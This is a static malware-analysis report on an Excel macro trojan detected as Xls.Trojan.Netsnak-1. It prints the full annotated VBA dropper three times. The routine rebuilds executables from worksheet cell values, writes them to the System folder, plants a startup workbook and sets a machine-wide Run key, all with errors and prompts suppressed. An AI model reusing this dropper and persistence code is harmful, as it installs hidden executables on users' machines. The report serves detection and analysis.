Xls.Trojan.Netsnak-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 0f13d5a8f48bd2c9…

MALICIOUS

Office (OLE)

331.5 KB Created: 1999-09-09 17:30:14 Authoring application: Microsoft Excel First seen: 2015-10-02
MD5: c578de05c3c150ea9cd2b510a89b4610 SHA-1: f2b8879787d8c332b55e200a872c35d51aea0a53 SHA-256: 0f13d5a8f48bd2c98d3a5aae78ed57ae9af7ef60d58118a7d0014a52f0cf5e73
220 Risk Score

Malware Insights

Xls.Trojan.Netsnak-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File Execution: Malicious File

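The file contains VBA macros that leverage WScript.Shell and scripting.filesystemobject to create directories and write executable files to the user's startup folder. The macro attempts to download and save files named 'winupdsv.exe' and 'sfcea.exe' to the startup directory, likely to execute a second-stage payload. The ClamAV detection name 'Xls.Trojan.Netsnak-1' further supports the malicious nature of the file. Note, however, that the macro preview below shows no network call: the two executables are rebuilt byte by byte from values stored in worksheet cells and written to the folder returned by getspecialfolder(1) (the Windows System folder), while 'norma1.xlm' is the file copied to Excel's startup path. Persistence for 'winupdsv.exe' is set through the 'WinUpdsv' value under the HKEY_LOCAL_MACHINE ...\CurrentVersion\Run key.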

Heuristics 5

  • ClamAV: Xls.Trojan.Netsnak-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Netsnak-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set w = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("scripting.filesystemobject")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8110 bytes
SHA-256: 20aab44873ff63f9c9d06e6b25591175208e6b9cab25da5aeccf715e94f650a5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Module1"
                                                                                                                                
Attribute VB_Name = "Module2"
' Analyst annotation: the code below is unchanged from the extracted sample.
' addsum is a dropper and persistence routine. It rebuilds three files from
' values stored in cells of the sheet "@kbtasto@she3#", writes them to disk,
' sets a Run-key value and plants a workbook in Excel's startup path.
' The Sub is Private and no call site is visible in this listing, so how it is
' triggered cannot be determined from the preview alone.
' The same routine body also appears in Module3 and Module4.
' Indicators visible in this routine: winupdsv.exe and sfcea.exe in the System
' folder, norma1.xlm in Excel's startup path and in <Templates>\Software\, and
' the Run value "WinUpdsv".
Private Sub addsum()
' One-byte buffer used for every binary write below.
Dim buf As Byte
' Runtime errors are ignored from here on, so a failed step (for example a
' denied file or registry write) produces no visible error.
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
' Staging folder: <Templates special folder>\Software\
myfolder = w.SpecialFolders("Templates") & "\Software\"
' GetSpecialFolder(1) is the FileSystemObject constant for the Windows System
' folder (0 = Windows folder, 2 = Temp folder).
folder1 = fso.getspecialfolder(1)
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
' Closes any open workbook named "normal.xlm" (letter l) and deletes that file
' from Excel's startup path.
' NOTE(review): why this file is targeted is not shown here - confirm.
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
' If a workbook named "norma1.xlm" (digit 1) is already open, the whole drop
' stage is skipped by jumping to label a1; presumably an "already installed"
' check.
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
' File 1: <System folder>\winupdsv.exe, written only if it does not exist.
' Source data is rows 1-54 of column 5. Each cell holds space-separated
' numbers; every token that is followed by a space is converted with CByte
' and written as one byte.
filesv = folder1 & "\winupdsv.exe"
If Not fso.fileexists(filesv) Then
Open filesv For Binary Access Write As #1
For i = 1 To 54
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' File 2: <System folder>\sfcea.exe, same decoding, rows 1-28 of column 4.
filesf = folder1 & "\sfcea.exe"
If Not fso.fileexists(filesf) Then
Open filesf For Binary Access Write As #1
For i = 1 To 28
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' File 3: <System folder>\norma1.xlm, same decoding, rows 1-89 of column 3.
filexlm = folder1 & "\norma1.xlm"
If Not fso.fileexists(filexlm) Then
Open filexlm For Binary Access Write As #1
For i = 1 To 89
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' norma1.xlm is copied into Excel's startup path (overwrite = True) and the
' copy in the System folder is removed.
fso.copyfile filexlm, Application.StartupPath & "\", True
fso.deletefile filexlm
' Persistence: sets the value "WinUpdsv" = "winupdsv.exe" under the
' machine-wide Run key. The data is a bare file name, not a full path.
' Writing under HKEY_LOCAL_MACHINE normally needs administrative rights; with
' errors suppressed above, a failure here is silent.
w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"
' Opens the planted workbook and copies the three encoded data columns (3, 4
' and 5) into it, so the startup workbook carries the same embedded data as
' this document.
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)
Workbooks("norma1.xlm").Save
' A second copy of the saved workbook goes to <Templates>\Software\.
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
' Deletes c:\C0MS.sys (digit 0 in the name); its role is not evident from
' this listing.
fso.deletefile "c:\C0MS.sys"
' Excel prompts are turned off and the workbook is marked as saved, so closing
' it raises no "save changes" dialog.
Application.DisplayAlerts = False
ThisWorkbook.Saved = True
End Sub

Attribute VB_Name = "Module3"
' Analyst annotation: the code below is unchanged from the extracted sample.
' addsum is a dropper and persistence routine. It rebuilds three files from
' values stored in cells of the sheet "@kbtasto@she3#", writes them to disk,
' sets a Run-key value and plants a workbook in Excel's startup path.
' The Sub is Private and no call site is visible in this listing, so how it is
' triggered cannot be determined from the preview alone.
' The same routine body also appears in Module2 and Module4.
' Indicators visible in this routine: winupdsv.exe and sfcea.exe in the System
' folder, norma1.xlm in Excel's startup path and in <Templates>\Software\, and
' the Run value "WinUpdsv".
Private Sub addsum()
' One-byte buffer used for every binary write below.
Dim buf As Byte
' Runtime errors are ignored from here on, so a failed step (for example a
' denied file or registry write) produces no visible error.
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
' Staging folder: <Templates special folder>\Software\
myfolder = w.SpecialFolders("Templates") & "\Software\"
' GetSpecialFolder(1) is the FileSystemObject constant for the Windows System
' folder (0 = Windows folder, 2 = Temp folder).
folder1 = fso.getspecialfolder(1)
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
' Closes any open workbook named "normal.xlm" (letter l) and deletes that file
' from Excel's startup path.
' NOTE(review): why this file is targeted is not shown here - confirm.
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
' If a workbook named "norma1.xlm" (digit 1) is already open, the whole drop
' stage is skipped by jumping to label a1; presumably an "already installed"
' check.
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
' File 1: <System folder>\winupdsv.exe, written only if it does not exist.
' Source data is rows 1-54 of column 5. Each cell holds space-separated
' numbers; every token that is followed by a space is converted with CByte
' and written as one byte.
filesv = folder1 & "\winupdsv.exe"
If Not fso.fileexists(filesv) Then
Open filesv For Binary Access Write As #1
For i = 1 To 54
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' File 2: <System folder>\sfcea.exe, same decoding, rows 1-28 of column 4.
filesf = folder1 & "\sfcea.exe"
If Not fso.fileexists(filesf) Then
Open filesf For Binary Access Write As #1
For i = 1 To 28
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' File 3: <System folder>\norma1.xlm, same decoding, rows 1-89 of column 3.
filexlm = folder1 & "\norma1.xlm"
If Not fso.fileexists(filexlm) Then
Open filexlm For Binary Access Write As #1
For i = 1 To 89
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' norma1.xlm is copied into Excel's startup path (overwrite = True) and the
' copy in the System folder is removed.
fso.copyfile filexlm, Application.StartupPath & "\", True
fso.deletefile filexlm
' Persistence: sets the value "WinUpdsv" = "winupdsv.exe" under the
' machine-wide Run key. The data is a bare file name, not a full path.
' Writing under HKEY_LOCAL_MACHINE normally needs administrative rights; with
' errors suppressed above, a failure here is silent.
w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"
' Opens the planted workbook and copies the three encoded data columns (3, 4
' and 5) into it, so the startup workbook carries the same embedded data as
' this document.
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)
Workbooks("norma1.xlm").Save
' A second copy of the saved workbook goes to <Templates>\Software\.
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
' Deletes c:\C0MS.sys (digit 0 in the name); its role is not evident from
' this listing.
fso.deletefile "c:\C0MS.sys"
' Excel prompts are turned off and the workbook is marked as saved, so closing
' it raises no "save changes" dialog.
Application.DisplayAlerts = False
ThisWorkbook.Saved = True
End Sub

Attribute VB_Name = "Module4"
' Analyst annotation: the code below is unchanged from the extracted sample.
' addsum is a dropper and persistence routine. It rebuilds three files from
' values stored in cells of the sheet "@kbtasto@she3#", writes them to disk,
' sets a Run-key value and plants a workbook in Excel's startup path.
' The Sub is Private and no call site is visible in this listing, so how it is
' triggered cannot be determined from the preview alone.
' The same routine body also appears in Module2 and Module3.
' Indicators visible in this routine: winupdsv.exe and sfcea.exe in the System
' folder, norma1.xlm in Excel's startup path and in <Templates>\Software\, and
' the Run value "WinUpdsv".
Private Sub addsum()
' One-byte buffer used for every binary write below.
Dim buf As Byte
' Runtime errors are ignored from here on, so a failed step (for example a
' denied file or registry write) produces no visible error.
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
' Staging folder: <Templates special folder>\Software\
myfolder = w.SpecialFolders("Templates") & "\Software\"
' GetSpecialFolder(1) is the FileSystemObject constant for the Windows System
' folder (0 = Windows folder, 2 = Temp folder).
folder1 = fso.getspecialfolder(1)
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
' Closes any open workbook named "normal.xlm" (letter l) and deletes that file
' from Excel's startup path.
' NOTE(review): why this file is targeted is not shown here - confirm.
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
' If a workbook named "norma1.xlm" (digit 1) is already open, the whole drop
' stage is skipped by jumping to label a1; presumably an "already installed"
' check.
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
' File 1: <System folder>\winupdsv.exe, written only if it does not exist.
' Source data is rows 1-54 of column 5. Each cell holds space-separated
' numbers; every token that is followed by a space is converted with CByte
' and written as one byte.
filesv = folder1 & "\winupdsv.exe"
If Not fso.fileexists(filesv) Then
Open filesv For Binary Access Write As #1
For i = 1 To 54
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' File 2: <System folder>\sfcea.exe, same decoding, rows 1-28 of column 4.
filesf = folder1 & "\sfcea.exe"
If Not fso.fileexists(filesf) Then
Open filesf For Binary Access Write As #1
For i = 1 To 28
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' File 3: <System folder>\norma1.xlm, same decoding, rows 1-89 of column 3.
filexlm = folder1 & "\norma1.xlm"
If Not fso.fileexists(filexlm) Then
Open filexlm For Binary Access Write As #1
For i = 1 To 89
hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
buf = CByte(Mid(hv, n, m - n))
Put #1, , buf
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
End If
' norma1.xlm is copied into Excel's startup path (overwrite = True) and the
' copy in the System folder is removed.
fso.copyfile filexlm, Application.StartupPath & "\", True
fso.deletefile filexlm
' Persistence: sets the value "WinUpdsv" = "winupdsv.exe" under the
' machine-wide Run key. The data is a bare file name, not a full path.
' Writing under HKEY_LOCAL_MACHINE normally needs administrative rights; with
' errors suppressed above, a failure here is silent.
w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"
' Opens the planted workbook and copies the three encoded data columns (3, 4
' and 5) into it, so the startup workbook carries the same embedded data as
' this document.
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)
ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)
Workbooks("norma1.xlm").Save
' A second copy of the saved workbook goes to <Templates>\Software\.
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
' Deletes c:\C0MS.sys (digit 0 in the name); its role is not evident from
' this listing.
fso.deletefile "c:\C0MS.sys"
' Excel prompts are turned off and the workbook is marked as saved, so closing
' it raises no "save changes" dialog.
Application.DisplayAlerts = False
ThisWorkbook.Saved = True
End Sub